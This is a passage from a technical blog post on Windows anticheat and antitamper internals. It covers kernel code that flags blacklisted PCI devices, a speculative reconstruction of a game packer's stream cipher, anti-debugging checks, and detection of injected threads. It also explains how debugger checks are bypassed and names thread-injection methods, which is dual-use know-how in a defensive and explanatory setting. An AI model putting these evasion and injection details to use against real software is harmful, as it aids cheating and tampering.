        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">if</span> (IsPciConfigurationSpaceFlagged(&amp;header)) {
        DEBUG_VERBOSE(<span class="hljs-string">"Flagged DeviceID found. Device: %llx, DeviceId: %lx"</span>,
                      (UINT64)DeviceObject,
                      header.DeviceID);
        ReportBlacklistedPcieDevice(DeviceObject, &amp;header);
    }
    <span class="hljs-keyword">else</span> {
        DEBUG_VERBOSE(<span class="hljs-string">"Device: %llx, DeviceID: %lx, VendorID: %lx"</span>,
                      DeviceObject,
                      header.DeviceID,
                      header.VendorID);
    }

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>To read the configuration space, we build a PnP IRP (I/O Request Packet) with the <code>IRP_MN_READ_CONFIG</code> minor function, send it to the PCI device, wait for it to complete if it is still pending, and return the status of the operation. The configuration space contains important registers such as the DeviceID, VendorID, Status, Command, and others, which are crucial for identifying the device.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">QueryPciDeviceConfigurationSpace</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject,
                                 _In_ UINT32         Offset,
                                 _Out_opt_ PVOID     Buffer,
                                 _In_ UINT32         BufferLength)</span>
</span>{
    NTSTATUS           status = STATUS_UNSUCCESSFUL;
    KEVENT             event  = {<span class="hljs-number">0</span>};
    IO_STATUS_BLOCK    io     = {<span class="hljs-number">0</span>};
    PIRP               irp    = <span class="hljs-literal">NULL</span>;
    PIO_STACK_LOCATION packet = <span class="hljs-literal">NULL</span>;

    <span class="hljs-keyword">if</span> (BufferLength == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_BUFFER_TOO_SMALL;

    KeInitializeEvent(&amp;event, NotificationEvent, FALSE);

    <span class="hljs-comment">/*
     * we dont need to free this IRP as the IO manager will free it when the
     * request is completed
     */</span>
    irp = IoBuildSynchronousFsdRequest(
        IRP_MJ_PNP, DeviceObject, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, &amp;event, &amp;io);

    <span class="hljs-keyword">if</span> (!irp) {
        DEBUG_ERROR(<span class="hljs-string">"IoBuildSynchronousFsdRequest failed with no status."</span>);
        <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
    }

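    <span class="hljs-comment">/* PnP IRPs must be initialised to STATUS_NOT_SUPPORTED before they are sent */</span>
    irp-&gt;IoStatus.Status = STATUS_NOT_SUPPORTED;

    packet                = IoGetNextIrpStackLocation(irp);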
    packet-&gt;MinorFunction = IRP_MN_READ_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.WhichSpace = PCI_WHICHSPACE_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.Offset     = Offset;
    packet-&gt;Parameters.ReadWriteConfig.Buffer     = Buffer;
    packet-&gt;Parameters.ReadWriteConfig.Length     = BufferLength;

    status = IoCallDriver(DeviceObject, irp);

    <span class="hljs-keyword">if</span> (status == STATUS_PENDING) {
        KeWaitForSingleObject(&amp;event, Executive, KernelMode, FALSE, <span class="hljs-literal">NULL</span>);
        status = io.Status;
    }

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"Failed to read configuration space with status %x"</span>,
                    status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Once the configuration space is read, we can check if the device ID is among the flagged IDs. If the device ID matches any of the flagged IDs, we can report the blacklisted device.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN
<span class="hljs-title">IsPciConfigurationSpaceFlagged</span><span class="hljs-params">(_In_ PPCI_COMMON_HEADER Configuration)</span>
</span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; FLAGGED_DEVICE_ID_COUNT; index++) {
        <span class="hljs-keyword">if</span> (Configuration-&gt;DeviceID == FLAGGED_DEVICE_IDS[index])
            <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<h1 id="heading-game-binary-and-driver-protection">Game Binary and Driver Protection</h1>
<p>One of the primary concerns for both EDR and anticheat developers is protecting their binaries and processes. While EDRs can sometimes fall back on protections granted to them through the Microsoft Virus Initiative (MVI) program, anticheat providers need to think of more creative ways to ward off static and dynamic analysis.</p>
<p>Usually anticheats don't operate alone, but alongside an antitamper solution. They also sometimes have really good ASCII art games, like this one from Packman, an antitamper for Vanguard Anticheat.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718800446008/4acff5ab-4dc0-4726-bfcb-3174395fbbde.png" alt class="image--center mx-auto" /></p>
<p>But Byfron's Hyperion, the antitamper used by Roblox, is definitely winning brownie points from me for (to my knowledge) the first implementation of <a target="_blank" href="https://github.com/xoreaxeaxeax/REpsych">REpsych</a> in production software.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718800262856/7a5e8e78-a3cc-4053-a58b-9c86ac7c2858.png" alt="Byfron Hyperion" class="image--center mx-auto" /></p>
<p>But what are the protections these antitamper systems give?</p>
<h2 id="heading-binary-packing">Binary Packing</h2>
<p>Binary packing is the technique of encrypting executable files and binaries to obscure their content, making it harder to detect or analyze them statically. Ideally in games, only authorized processes can access and modify the game assets, thereby protecting the game's integrity.</p>
<p>But encrypting and decrypting game assets and binaries can have a severe impact on performance, despite what some <a target="_blank" href="https://www.youtube.com/watch?v=mcyOJ4Dxs7E">DRM providers</a> would have you believe. While there are many <a target="_blank" href="https://www.reddit.com/r/pcgaming/comments/15ud3zf/can_someone_explain_to_me_what_is_vmprotect/">packers on the market today</a>, they are often very performance heavy and offer little control to improve performance in graphics-heavy applications.</p>
<p>For the aforementioned Packman, Riot Games somewhat explains how it works <a target="_blank" href="https://technology.riotgames.com/news/riots-approach-anti-cheat">here</a>. The code below is not an exact replica of their solution, but more of what I think such a solution looks like. Mind you, it is based on incomplete information from their blog post and likely doesn't work anymore.</p>
<p>The encryption process starts by setting up a key structure, which holds the cipher state for each decryption event. We then initialize this state using a randomly generated seed value.</p>
<pre><code class="lang-c"><span class="hljs-comment">// typedef so that plain C code can refer to the type as GKey</span>
<span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">GKey</span> {</span>
    <span class="hljs-keyword">uint8_t</span> key[<span class="hljs-number">0x100</span>];
    <span class="hljs-keyword">uint8_t</span> count;
    <span class="hljs-keyword">uint8_t</span> hold;
} GKey;

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">SpawnKey</span><span class="hljs-params">(GKey* gk, <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint8_t</span>* seed, <span class="hljs-keyword">size_t</span> len)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x100</span>; i++) {
        gk-&gt;key[i] = i;
    }
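    gk-&gt;count = <span class="hljs-number">0</span>; <span class="hljs-comment">// start both stream counters from a known state</span>
    gk-&gt;hold = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">uint8_t</span> h = <span class="hljs-number">0</span>;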
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x100</span>; i++) {
        <span class="hljs-keyword">uint8_t</span> j = gk-&gt;key[i];
        h += seed[i % len] + j;
        gk-&gt;key[i] = gk-&gt;key[h];
        gk-&gt;key[h] = j;
    }
}
</code></pre>
<p>The encryption routine uses an initialized key to encrypt the data and the same function is used for both encryption and decryption due to the symmetry of the XOR operation. Each byte of the input data is encrypted by modifying the <code>count</code> and <code>hold</code> counters and performing a series of swaps and XOR operations.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">Encrypt</span><span class="hljs-params">(GKey* gk, <span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span>* in, <span class="hljs-keyword">void</span>* out, <span class="hljs-keyword">size_t</span> len)</span> </span>{
    <span class="hljs-keyword">uint8_t</span> t1, t2;
    <span class="hljs-keyword">uint8_t</span> j;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint32_t</span> i = <span class="hljs-number">0</span>; i &lt; len; i++) {
        gk-&gt;count++;
        j = gk-&gt;count;
        gk-&gt;hold += gk-&gt;key[j];
        t1 = gk-&gt;key[j];
        t2 = gk-&gt;key[gk-&gt;hold];
        gk-&gt;key[j] = t2;
        gk-&gt;key[gk-&gt;hold] = t1;
        t1 += t2;
        ((<span class="hljs-keyword">uint8_t</span>*)out)[i] = ((<span class="hljs-keyword">uint8_t</span>*)in)[i] ^ gk-&gt;key[t1];
    }
}
</code></pre>
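<p>As a quick sanity check of the symmetry claim, here is a minimal sketch that restates the key setup and the stream routine and round-trips a buffer through them. The names <code>StreamKey</code>, <code>stream_init</code>, <code>stream_xor</code> and <code>roundtrip_ok</code> are hypothetical, as are the seed and the sample bytes. The construction has the same shape as RC4: a key-scheduling pass followed by a swap-based keystream.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Hypothetical restatement of GKey: a 256-byte permutation plus two counters. */
typedef struct {
    uint8_t key[0x100];
    uint8_t count;
    uint8_t hold;
} StreamKey;

/* Key setup: identity permutation shuffled by the seed, counters reset. */
void stream_init(StreamKey *sk, const uint8_t *seed, size_t len) {
    for (int i = 0; i &lt; 0x100; i++)
        sk-&gt;key[i] = (uint8_t)i;
    sk-&gt;count = 0;
    sk-&gt;hold = 0;
    uint8_t h = 0;
    for (int i = 0; i &lt; 0x100; i++) {
        uint8_t j = sk-&gt;key[i];
        h = (uint8_t)(h + seed[i % len] + j);
        sk-&gt;key[i] = sk-&gt;key[h];
        sk-&gt;key[h] = j;
    }
}

/* XOR the buffer with the keystream; the same call encrypts and decrypts. */
void stream_xor(StreamKey *sk, const uint8_t *in, uint8_t *out, size_t len) {
    for (size_t i = 0; i &lt; len; i++) {
        sk-&gt;count++;
        uint8_t a = sk-&gt;key[sk-&gt;count];
        sk-&gt;hold = (uint8_t)(sk-&gt;hold + a);
        uint8_t b = sk-&gt;key[sk-&gt;hold];
        sk-&gt;key[sk-&gt;count] = b;
        sk-&gt;key[sk-&gt;hold] = a;
        out[i] = in[i] ^ sk-&gt;key[(uint8_t)(a + b)];
    }
}

/* Returns 1 when encrypting and then decrypting restores the input. */
int roundtrip_ok(void) {
    static const uint8_t seed[] = { 0xde, 0xad, 0xbe, 0xef };
    const uint8_t plain[] = "packed .text bytes";
    uint8_t cipher[sizeof plain], back[sizeof plain];
    StreamKey sk;

    stream_init(&amp;sk, seed, sizeof seed);
    stream_xor(&amp;sk, plain, cipher, sizeof plain);

    stream_init(&amp;sk, seed, sizeof seed);   /* decryption needs a fresh key state */
    stream_xor(&amp;sk, cipher, back, sizeof plain);

    return memcmp(plain, back, sizeof plain) == 0 &amp;&amp;
           memcmp(plain, cipher, sizeof plain) != 0;
}
</code></pre>
<p>The second <code>stream_init</code> call is the important part: the keystream depends on the evolving table and counters, so decrypting with the state left over from encryption would produce garbage.</p>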
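<p>When the game client is executed, the .text section of the executable file needs to be decrypted. Because the cipher is a symmetric XOR stream, <code>Decrypt</code> has the same body as <code>Encrypt</code>; what matters is that the key is re-initialized from the seed first. Decryption then proceeds in stages, starting with the primary seed.</p>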
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">Decrypt</span><span class="hljs-params">(GKey* gk, <span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span>* in, <span class="hljs-keyword">void</span>* out, <span class="hljs-keyword">size_t</span> len)</span> </span>{
    <span class="hljs-keyword">uint8_t</span> t1, t2;
    <span class="hljs-keyword">uint8_t</span> j;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint32_t</span> i = <span class="hljs-number">0</span>; i &lt; len; i++) {
        gk-&gt;count++;
        j = gk-&gt;count;
        gk-&gt;hold += gk-&gt;key[j];
        t1 = gk-&gt;key[j];
        t2 = gk-&gt;key[gk-&gt;hold];
        gk-&gt;key[j] = t2;
        gk-&gt;key[gk-&gt;hold] = t1;
        t1 += t2;
        ((<span class="hljs-keyword">uint8_t</span>*)out)[i] = ((<span class="hljs-keyword">uint8_t</span>*)in)[i] ^ gk-&gt;key[t1];
    }
}
</code></pre>
<p>Riot Games overcame the limitations of traditional stub code injection by using an external library for unpacking. This method allows for validating game dependencies before they are loaded, ensuring the integrity of the game’s libraries. The process involves modifying the game’s import descriptors to list only their custom library, which loads first and validates other dependencies.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Pointers to the 'real' Import Table and array of name lengths</span>
IMAGE_IMPORT_DESCRIPTOR* import_descriptor_ptr = (IMAGE_IMPORT_DESCRIPTOR*)(league + <span class="hljs-number">0x13D4B10</span>);
<span class="hljs-keyword">uint32_t</span>* import_name_len_ptr = (<span class="hljs-keyword">uint32_t</span>*)(stub + <span class="hljs-number">0xBF5C8</span>);

<span class="hljs-comment">// Decrypt and validate the imports</span>
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x13</span>; i++) {
    Decrypt(&amp;gk, import_descriptor_ptr, import_descriptor_ptr, <span class="hljs-number">0x14</span>);
    <span class="hljs-keyword">size_t</span> len = *import_name_len_ptr;
    <span class="hljs-keyword">uint8_t</span>* name_ptr = league + import_descriptor_ptr-&gt;name_rva;
    Decrypt(&amp;gk, name_ptr, name_ptr, len);
    <span class="hljs-comment">// Validate and load libraries</span>
    import_descriptor_ptr++;
    import_name_len_ptr++;
}
</code></pre>
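<p>The <code>0x14</code> passed to <code>Decrypt</code> in that loop matches the size of one PE import descriptor, which is five 32-bit fields. The sketch below mirrors that layout in portable C and counts entries up to the all-zero terminator. <code>ImportDescriptor</code>, <code>count_import_descriptors</code> and the sample table are hypothetical stand-ins for illustration, not the Windows <code>IMAGE_IMPORT_DESCRIPTOR</code> definition itself.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Portable mirror of the five 32-bit fields in a PE import descriptor. */
typedef struct {
    uint32_t original_first_thunk; /* RVA of the import lookup table */
    uint32_t time_date_stamp;
    uint32_t forwarder_chain;
    uint32_t name_rva;             /* RVA of the DLL name string */
    uint32_t first_thunk;          /* RVA of the import address table */
} ImportDescriptor;

/* Counts entries up to the all-zero terminator, never reading past max. */
size_t count_import_descriptors(const ImportDescriptor *table, size_t max) {
    size_t n = 0;
    while (n &lt; max &amp;&amp;
           (table[n].original_first_thunk || table[n].time_date_stamp ||
            table[n].forwarder_chain || table[n].name_rva || table[n].first_thunk))
        n++;
    return n;
}

/* Self-check with a made-up two-entry table followed by the terminator. */
int import_table_demo(void) {
    const ImportDescriptor table[3] = {
        { 0x2000, 0, 0, 0x3000, 0x4000 },
        { 0x2100, 0, 0, 0x3010, 0x4100 },
        { 0, 0, 0, 0, 0 },
    };
    return sizeof(ImportDescriptor) == 0x14 &amp;&amp;
           count_import_descriptors(table, 3) == 2;
}
</code></pre>
<p>With the descriptors encrypted on disk, a terminator scan like this only works after decryption, which is presumably why the loop above uses a fixed count instead.</p>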
<p>The .text section is decrypted in pages, allowing for non-sequential decryption. Each 4096-byte page is decrypted independently with a key re-derived from one of the stored seeds, so any page can be decrypted without first processing the pages before it.</p>
<pre><code class="lang-c"><span class="hljs-keyword">uint32_t</span> num_pages = ltext_len / <span class="hljs-number">0x1000</span>;
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint32_t</span> i = <span class="hljs-number">1</span>; i &lt;= num_pages; i++) {
    <span class="hljs-built_in">memset</span>(&amp;gk, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(GKey));
    <span class="hljs-keyword">uint8_t</span>* seed = decrypt2_seed + ((i % <span class="hljs-number">0x53</span>) * decrypt2_seed_len);
    <span class="hljs-keyword">uint8_t</span>* text = league + (i * <span class="hljs-number">0x1000</span>);
    SpawnKey(&amp;gk, seed, decrypt2_seed_len);
    Decrypt(&amp;gk, text, text, <span class="hljs-number">0x1000</span>);
}
</code></pre>
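<p>One consequence of the <code>i % 0x53</code> indexing is worth spelling out: the seed table has only 0x53 (83) slots, so in this reconstruction pages that are 83 apart share a seed. The helpers below are a small sketch of that arithmetic, plus the page count the loop works with. All names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

#define PACK_PAGE_SIZE  0x1000u  /* page granularity used by the loop above */
#define PACK_SEED_SLOTS 0x53u    /* number of seed slots implied by i % 0x53 */

/* Byte offset into the seed table for a given 1-based page index. */
size_t seed_offset_for_page(uint32_t page, size_t seed_len) {
    return (size_t)(page % PACK_SEED_SLOTS) * seed_len;
}

/* Whole pages covered by the loop; a trailing partial page is not counted. */
uint32_t whole_pages(uint32_t text_len) {
    return text_len / PACK_PAGE_SIZE;
}

/* Bytes left over after the last whole page (0 when page-aligned). */
uint32_t tail_bytes(uint32_t text_len) {
    return text_len % PACK_PAGE_SIZE;
}
</code></pre>
<p>For example, pages 1 and 0x54 map to the same seed offset, and a 0x2800-byte section yields two whole pages plus 0x800 tail bytes that the division in the loop above does not account for.</p>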
<h2 id="heading-anti-debugging">Anti-Debugging</h2>
<p>While static analysis can be thwarted easily, the use of dynamic analysis tools presents a more complicated challenge. Anti-debugging techniques in anti-cheat systems are designed to detect and counteract these tools.</p>
<p>Windows itself has built-in debugger checks such as the <code>IsDebuggerPresent</code> and <code>CheckRemoteDebuggerPresent</code> functions. <code>IsDebuggerPresent</code> reads the <code>PEB</code> (Process Environment Block) of the calling process, which contains a flag named <code>BeingDebugged</code> that is set to <code>1</code> if a debugger is attached, while <code>CheckRemoteDebuggerPresent</code> asks the kernel whether the target process has a debug port. The problem with these solutions is that they are easily circumvented by patching the flag or hooking the query. If you use OllyDbg or x32dbg/x64dbg as a debugger, this can be done directly with plugins such as <a target="_blank" href="https://github.com/x64dbg/ScyllaHide">ScyllaHide</a>.</p>
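<p>To see why the flag is so easy to defeat, the sketch below models the PEB as a raw byte buffer. <code>BeingDebugged</code> sits at byte offset 2 of the PEB on both x86 and x64 Windows; the buffer and the helper names are hypothetical so that the example runs anywhere, and nothing here touches a real PEB.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define PEB_BEING_DEBUGGED_OFFSET 2  /* byte offset of BeingDebugged in the PEB */

/* What a PEB-based debugger check boils down to: read one byte. */
int peb_reports_debugger(const uint8_t *peb) {
    return peb[PEB_BEING_DEBUGGED_OFFSET] != 0;
}

/* What a hiding plugin boils down to: clear that same byte. */
void peb_hide_debugger(uint8_t *peb) {
    peb[PEB_BEING_DEBUGGED_OFFSET] = 0;
}

/* Self-check on a fake PEB: the flag is seen, patched, then no longer seen. */
int peb_patch_demo(void) {
    uint8_t fake_peb[16] = { 0 };
    fake_peb[PEB_BEING_DEBUGGED_OFFSET] = 1;   /* pretend a debugger attached */

    int before = peb_reports_debugger(fake_peb);
    peb_hide_debugger(fake_peb);
    int after = peb_reports_debugger(fake_peb);

    return before == 1 &amp;&amp; after == 0;
}
</code></pre>
<p>A check that can be silenced with a single byte write from inside the process is not much of an obstacle to anyone who already controls that process.</p>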
<p>This is why many packers protect binaries from debuggers using some more interesting methods, one of them being the use of <code>INT 3</code>. The <code>INT 3</code> instruction is normally encoded as a single-byte opcode (<code>0xCC</code>) designed to signal a breakpoint; the example below emits its two-byte long form (<code>0xCD 0x03</code>) instead. When the CPU executes either form, it generates an <code>EXCEPTION_BREAKPOINT</code>, which is a specific type of interrupt that transfers control to an exception handler. In the context of Windows, the exception handler is part of the system's structured exception handling (SEH) mechanism.</p>
<pre><code class="lang-c"><span class="hljs-keyword">bool</span> g_bDebugged = <span class="hljs-literal">false</span>;

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">filter</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> code, struct _EXCEPTION_POINTERS *ep)</span>
</span>{
    g_bDebugged = code != EXCEPTION_BREAKPOINT;
    <span class="hljs-keyword">return</span> EXCEPTION_EXECUTE_HANDLER;
}

<span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">IsDebugged</span><span class="hljs-params">()</span>
</span>{
    __try
    {
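        __asm __emit(<span class="hljs-number">0xCD</span>);
        __asm __emit(<span class="hljs-number">0x03</span>);
        <span class="hljs-comment">// Reached only if something swallowed the exception before our handler ran</span>
        <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;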
    }
    __except (filter(GetExceptionCode(), GetExceptionInformation()))
    {
        <span class="hljs-keyword">return</span> g_bDebugged;
    }
}
</code></pre>
<p>When the <code>EXCEPTION_BREAKPOINT</code> occurs, Windows decrements the Instruction Pointer (EIP) by one so that it points to the assumed address of the <code>0xCC</code> opcode. This adjustment is what lets a debugger recognize and process a normal single-byte breakpoint. With the two-byte form, however, EIP ends up in the middle of the instruction, on the <code>0x03</code> byte, so a debugger that resumes from there without fixing EIP up raises a different exception, and the filter above flags the process as debugged.</p>
<p>When a process is being traced in a debugger, the delay between the execution of one instruction and the next can be significant. Detecting these delays can also help in identifying the presence of a debugger. For this purpose, we can use the <code>RDPMC</code> instruction to read the performance monitoring counters of the processor.</p>
<p>These counters keep track of various events such as the number of instructions executed, cache misses, and more. The usage of <code>RDPMC</code> requires the PCE (Performance-Monitoring Counter Enable) flag to be set in the CR4 register, which typically limits its usage to kernel mode.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">IsDebugged</span><span class="hljs-params">(DWORD64 qwNativeElapsed)</span>
</span>{
    ULARGE_INTEGER Start, End;
    __asm
    {
        <span class="hljs-keyword">xor</span>  ecx, ecx    <span class="hljs-comment">// Select performance counter 0</span>
        rdpmc            <span class="hljs-comment">// Read performance counter</span>
        mov  Start.LowPart, eax
        mov  Start.HighPart, edx
    }

    <span class="hljs-comment">// ... some work ...</span>

    __asm
    {
        <span class="hljs-keyword">xor</span>  ecx, ecx    <span class="hljs-comment">// Select performance counter 0</span>
        rdpmc            <span class="hljs-comment">// Read performance counter</span>
        mov  End.LowPart, eax
        mov  End.HighPart, edx
    }

    <span class="hljs-keyword">return</span> (End.QuadPart - Start.QuadPart) &gt; qwNativeElapsed;
}
</code></pre>
<p><code>RDPMC</code> is used to read the performance counter before and after executing some work. By comparing the difference with a predefined threshold, we can detect if a debugger or VM is slowing down execution.</p>
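<p><code>RDPMC</code> is awkward to demonstrate outside the kernel, so the sketch below swaps in a monotonic clock (POSIX <code>clock_gettime</code>) to show the same before/after comparison in user mode. This is a different time source from the one described above, not a replacement for it; the function names, the stand-in workloads and the thresholds are all hypothetical.</p>
<pre><code class="lang-c">#define _POSIX_C_SOURCE 200809L
#include &lt;stdint.h&gt;
#include &lt;time.h&gt;

/* Monotonic timestamp in nanoseconds. */
static uint64_t now_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &amp;ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Runs work() and reports whether it took longer than limit_ns. */
int took_longer_than(void (*work)(void), uint64_t limit_ns) {
    uint64_t start = now_ns();
    work();
    return (now_ns() - start) &gt; limit_ns;
}

/* Stand-ins for "some work": one returns at once, one sleeps for 5 ms
   to imitate the stall a single-stepping debugger would introduce. */
void fast_work(void) { }

void slow_work(void) {
    struct timespec pause = { 0, 5 * 1000 * 1000 };
    nanosleep(&amp;pause, NULL);
}
</code></pre>
<p>Calling <code>took_longer_than(slow_work, 1000000)</code> trips the 1 ms threshold, while <code>fast_work</code> stays far below any sensible limit. Picking a threshold that separates a debugger from ordinary scheduling noise is the hard part in practice.</p>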
<h1 id="heading-telemetry-amp-defenses-in-anticheats">Telemetry &amp; Defenses in Anticheats</h1>
<p>Telemetry is important for detecting behaviors that are closely linked to cheating. This is where anticheats differ from EDRs, whose main line of <a target="_blank" href="https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?gid=1993314609#gid=1993314609">telemetry</a> is OS-provided event streams like <a target="_blank" href="https://research.meekolab.com/introduction-into-microsoft-threat-intelligence-drivers-etw-ti">Microsoft Threat Intelligence Drivers (ETW-TI)</a>, which are locked behind the Microsoft MVI program. Anticheats do not have access to these event streams. EDRs are also protected using things like Early Launch Anti Malware (ELAM) drivers and Protected Process Light (PPL), which are likewise locked behind the MVI program.</p>
<h2 id="heading-attached-thread-detection">Attached Thread Detection</h2>
<p>Attached thread detection is a technique used to identify and monitor threads that are injected into a process. This process is crucial for anti-cheat systems, as it allows the detection of unauthorized threads that might be used to read or modify game memory, disrupt normal operations, or execute arbitrary code within the game's process space.</p>
<p>In the Windows operating system, threads can be created within a process using various methods, including <code>CreateRemoteThread</code>, <code>NtCreateThreadEx</code>, or through DLL injection. By monitoring these threads, one can identify and potentially prevent malicious activities.</p>
<p>To start, the driver sets up a notification routine for thread creation using the <code>PsSetCreateThreadNotifyRoutine</code> API. This routine gets called whenever a new thread is created in the system.</p>
<pre><code class="lang-cpp"><span class="hljs-function">NTSTATUS <span class="hljs-title">DriverEntry</span><span class="hljs-params">(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)</span>
</span>{
    NTSTATUS status;
    DriverObject-&gt;DriverUnload = DriverUnload;

    status = PsSetCreateThreadNotifyRoutine(ThreadCreateNotifyRoutine);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
    {
        DbgPrint(<span class="hljs-string">"Failed to set thread creation notify routine\n"</span>);
        <span class="hljs-keyword">return</span> status;
    }

    DbgPrint(<span class="hljs-string">"Driver loaded successfully\n"</span>);
    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>
<p><code>PsSetCreateThreadNotifyRoutine</code> registers <code>ThreadCreateNotifyRoutine</code> as the callback function that will be invoked whenever a thread is created or deleted. The <code>DriverUnload</code> function (not shown here) is expected to remove this callback when the driver is unloaded.</p>
<p>When a new thread is created, the <code>ThreadCreateNotifyRoutine</code> function is called. This function retrieves the thread object using <code>PsLookupThreadByThreadId</code> and then validates the thread's context.</p>
<pre><code class="lang-cpp"><span class="hljs-function">VOID <span class="hljs-title">ThreadCreateNotifyRoutine</span><span class="hljs-params">(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create)</span>
</span>{
    <span class="hljs-keyword">if</span> (Create)
    {
        PETHREAD Thread;
        NTSTATUS status = PsLookupThreadByThreadId(ThreadId, &amp;Thread);
        <span class="hljs-keyword">if</span> (NT_SUCCESS(status))
        {
            <span class="hljs-keyword">if</span> (!ValidateThreadContext(Thread))
            {
                DbgPrint(<span class="hljs-string">"Unauthorized thread detected in process %lu\n"</span>, HandleToULong(ProcessId));
            }
            ObDereferenceObject(Thread);
        }
    }
}
</code></pre>
<p>In the <code>ThreadCreateNotifyRoutine</code>, when a thread is created (<code>Create</code> is <code>TRUE</code>), the function looks up the thread object using <code>PsLookupThreadByThreadId</code>. Once the thread object is retrieved, it is passed to the <code>ValidateThreadContext</code> function to determine if the thread is legitimate.</p>
<p>The <code>ValidateThreadContext</code> function performs a basic check to see if the thread's starting address falls within a known valid range for the process. Real-world implementations would involve more complex checks, but this is just a lazy example.</p>
<pre><code class="lang-cpp"><span class="hljs-function">BOOLEAN <span class="hljs-title">ValidateThreadContext</span><span class="hljs-params">(PETHREAD Thread)</span>
</span>{
    PVOID StartAddress = PsGetThreadStartAddress(Thread);
    PEPROCESS Process = IoThreadToProcess(Thread);
    PVOID BaseAddress = PsGetProcessSectionBaseAddress(Process);

    <span class="hljs-keyword">if</span> ((ULONG_PTR)StartAddress &gt;= (ULONG_PTR)BaseAddress &amp;&amp;
        (ULONG_PTR)StartAddress &lt; (ULONG_PTR)BaseAddress + <span class="hljs-number">0x1000000</span>) <span class="hljs-comment">// 16 MB range</span>
    {
        <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<p><code>ValidateThreadContext</code> retrieves the thread's start address using <code>PsGetThreadStartAddress</code> and compares it with the base address of the process obtained through <code>PsGetProcessSectionBaseAddress</code>. If the start address falls within a 16 MB range of the base address, the thread is considered valid. Otherwise, it is flagged as potentially unauthorized. The 16 MB window is an arbitrary stand-in here; a real check would use the actual size of the mapped image.</p>
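<p>The range test itself is easy to get subtly wrong, so here is a minimal, portable sketch of it. It treats the image as the half-open range from <code>base</code> to <code>base + size</code> and is written as a subtraction so that the upper bound cannot wrap around near the top of the address space. The function name and the sample addresses are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* 1 when addr lies in [base, base + size), 0 otherwise.
   Comparing (addr - base) against size avoids computing base + size,
   which could overflow for ranges near the top of the address space. */
int address_in_image(uint64_t addr, uint64_t base, uint64_t size) {
    return addr &gt;= base &amp;&amp; (addr - base) &lt; size;
}
</code></pre>
<p>With a base of <code>0x140000000</code> and a size of <code>0x20000</code>, the address <code>0x140001000</code> is inside the image, while <code>0x140020000</code> (one past the end) and <code>0x13fffffff</code> (one below the base) are not.</p>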
<p>This approach allows the detection of threads that do not originate from the expected code regions within the process, which is a common characteristic of threads injected by malicious actors. By integrating this detection mechanism into a kernel-mode driver, anti-cheat systems can effectively monitor and respond to unauthorized thread creation, thereby enhancing the security and integrity of the game.</p>
<h2 id="heading-dpcapc-stackwalking">DPC/APC Stackwalking</h2>
